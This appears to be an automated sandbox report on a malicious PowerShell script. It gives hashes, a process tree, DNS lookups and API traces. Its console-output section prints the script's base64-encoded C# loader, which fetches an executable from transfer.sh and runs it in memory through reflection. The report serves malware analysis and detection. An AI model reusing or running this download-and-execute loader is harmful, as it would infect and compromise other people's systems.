Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Jan. 19, 2022, 9:44 a.m.	Jan. 19, 2022, 9:48 a.m.

Size	2.2KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`0e1653316ca12c3edbac35d9af6350a6`
SHA256	`5e181ecdd9349168f8bacb1a973be9a3c7420ed3f3e670e9c5ba4da6fb34af9f`
CRC32	`D0AC15F6`
ssdeep	`48:tmqaJ/xvdyEWun4E1Nh8fXX+Kby/IWfXBMifPpfMe6K19g/JGNKzwzWu0Ve:ti/xvMEr4wNWeljRMISeB3g4NiGr0Ve`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\ffffffffffffff.ps1
2872
- csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\fqxbg4nx.cmdline"
  3012
  - cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESEBE7.tmp" "c:\Users\test22\AppData\Local\Temp\CSCEBB7.tmp"
    2068

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 182.162.106.33 CNAME a1952.dscq.akamai.net A 182.162.106.32 CNAME identrust.edgesuite.net	119.207.65.153
transfer.sh	A 144.76.136.153	144.76.136.153

IP Address	Status	Action
144.76.136.153	Active	Moloch
164.124.101.2	Active	Moloch
182.162.106.32	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Jan. 19, 2022, 9:44 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (35 events)

Time & API	Arguments	Status	Return
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: Exception calling "btXCLQIFCzVGcuqbDRRKXPLPi" with "0" argument(s): "The underl console_handle: 0x00000023	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: ying connection was closed: Could not establish trust relationship for the SSL/ console_handle: 0x0000002f	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: TLS secure channel." console_handle: 0x0000003b	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\ffffffffffffff.ps1:1 char:2275 console_handle: 0x00000047	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: + $whatever = "dXNpbmcgU3lzdGVtO3VzaW5nIFN5c3RlbS5JTzt1c2luZyBTeXN0ZW0uTmV0O3Vz console_handle: 0x00000053	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: aW5nIFN5c3RlbS5SZWZsZWN0aW9uO3VzaW5nIFN5c3RlbS5UaHJlYWRpbmc7bmFtZXNwYWNlIGN4UHN console_handle: 0x0000005f	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: lUHZza0cuU3ptakNHVW1RRwp7cHVibGljIGNsYXNzIFVza05TWlNLd1pUSHdWQVZ1YVVmZHltSFQKe3 console_handle: 0x0000006b	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: ByaXZhdGUgY29uc3Qgc3RyaW5nIGF2cG1aTFNSRUFtR2R4cXJWd0hrU1dKV0Y9Imh0dHBzOi8vdHJhb console_handle: 0x00000077	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: nNmZXIuc2gvZ2V0L1VVMklhcC9kZGRkZHNkc2Rzc2RzLmV4ZSI7cHJpdmF0ZSBNZW1vcnlTdHJlYW0g console_handle: 0x00000083	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: aVphZld5UXhxV0dyT1JmQlJyc0ZwQ010YT1uZXcgTWVtb3J5U3RyZWFtKCk7W1NUQVRocmVhZF0KcHV console_handle: 0x0000008f	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: ibGljIHZvaWQgYnRYQ0xRSUZDelZHY3VxYkRSUktYUExQaSgpCntDQ1ZHaU1oSVVwSVNuZHJKbGJDSE console_handle: 0x0000009b	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: Jya0RDKCk7VklxU1lJTVZBcmphTWhOSHBwa2tMWHJ0YigpO30KcHJpdmF0ZSB2b2lkIFZJcVNZSU1WQ console_handle: 0x000000a7	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: XJqYU1oTkhwcGtrTFhydGIoKQp7Ynl0ZVtdYnVmZmVyPWlaYWZXeVF4cVdHck9SZkJScnNGcENNdGEu console_handle: 0x000000b3	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: VG9BcnJheSgpO0Fzc2VtYmx5IGFzc2VtYmx5PW51bGw7aWYoRW52aXJvbm1lbnQuVmVyc2lvbi5NYWp console_handle: 0x000000bf	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: vcj49NCkKe01ldGhvZEluZm8gbWV0aG9kPVR5cGUuR2V0VHlwZSgiU3lzdGVtLlJlZmxlY3Rpb24uUn console_handle: 0x000000cb	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: VudGltZUFzc2VtYmx5IikuR2V0TWV0aG9kKCJuTG9hZEltYWdlIixCaW5kaW5nRmxhZ3MuTm9uUHVib console_handle: 0x000000d7	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: GljfEJpbmRpbmdGbGFncy5TdGF0aWMpO2Fzc2VtYmx5PShBc3NlbWJseSltZXRob2QuSW52b2tlKG51 console_handle: 0x000000e3	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: bGwsbmV3IG9iamVjdFtde2J1ZmZlcixudWxsLG51bGwsbnVsbCxmYWxzZSxmYWxzZSxudWxsfSk7fWV console_handle: 0x000000ef	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: sc2UKe01ldGhvZEluZm8gbWV0aG9kPVR5cGUuR2V0VHlwZSgiU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW console_handle: 0x000000fb	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: 1ibHkiKS5HZXRNZXRob2QoIm5Mb2FkSW1hZ2UiLEJpbmRpbmdGbGFncy5Ob25QdWJsaWN8QmluZGluZ console_handle: 0x00000107	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: 0ZsYWdzLlN0YXRpYyk7YXNzZW1ibHk9KEFzc2VtYmx5KW1ldGhvZC5JbnZva2UobnVsbCxuZXcgb2Jq console_handle: 0x00000113	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: ZWN0W117YnVmZmVyLG51bGwsbnVsbCxudWxsLGZhbHNlfSk7fQpvYmplY3RbXWFyZ3M9bmV3IG9iamV console_handle: 0x0000011f	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: jdFsxXTtpZihhc3NlbWJseS5FbnRyeVBvaW50LkdldFBhcmFtZXRlcnMoKS5MZW5ndGg9PTApCmFyZ3 console_handle: 0x0000012b	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: M9bnVsbDthc3NlbWJseS5FbnRyeVBvaW50Lkludm9rZShudWxsLGFyZ3MpO30KcHJpdmF0ZSB2b2lkI console_handle: 0x00000137	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: ENDVkdpTWhJVXBJU25kckpsYkNIQnJrREMoKQp7V2ViUmVxdWVzdCByZXF1ZXN0PVdlYlJlcXVlc3Qu console_handle: 0x00000143	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: Q3JlYXRlKGF2cG1aTFNSRUFtR2R4cXJWd0hrU1dKV0YpO1dlYlJlc3BvbnNlIHJlc3BvbnNlPXJlcXV console_handle: 0x0000014f	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: lc3QuR2V0UmVzcG9uc2UoKTt1c2luZyhTdHJlYW0gd2ViX3N0cmVhbT1yZXNwb25zZS5HZXRSZXNwb2 console_handle: 0x0000015b	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: 5zZVN0cmVhbSgpKQp7Ynl0ZVtdYnVmZmVyPW5ldyBieXRlWzgxOTJdO2ludCByZWFkPTA7d2hpbGUoK console_handle: 0x00000167	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: HJlYWQ9d2ViX3N0cmVhbS5SZWFkKGJ1ZmZlciwwLGJ1ZmZlci5MZW5ndGgpKT4wKQp7aVphZld5UXhx console_handle: 0x00000173	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: V0dyT1JmQlJyc0ZwQ010YS5Xcml0ZShidWZmZXIsMCxyZWFkKTt9fQpyZXNwb25zZS5DbG9zZSgpO31 console_handle: 0x0000017f	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: 9fQ==";$dec = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($what console_handle: 0x0000018b	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: ever));Add-Type -TypeDefinition $dec;$instance = New-Object cxPsePvskG.SzmjCGUm console_handle: 0x00000197	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: QG.UskNSZSKwZTHwVAVuaUfdymHT;$instance.btXCLQIFCzVGcuqbDRRKXPLPi <<<< (); console_handle: 0x000001a3	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001af	1	1
WriteConsoleW Jan. 19, 2022, 9:44 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001bb	1	1

Uses Windows APIs to generate a cryptographic key (50 events)

Time & API	Arguments	Status	Return
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05032b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05032b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05032b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05032b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05032b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05032b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca140 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 19, 2022, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ca040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Performs some HTTP requests (1 event)

request

GET http://apps.identrust.com/roots/dstrootcax3.p7c

Allocates read-write-execute memory (usually to unpack itself) (34 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026af000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02239000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05711000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05576000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05577000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05578000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02246000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05750000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06bc0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06d9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06dab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06dac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06dad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 19, 2022, 9:44 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05751000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
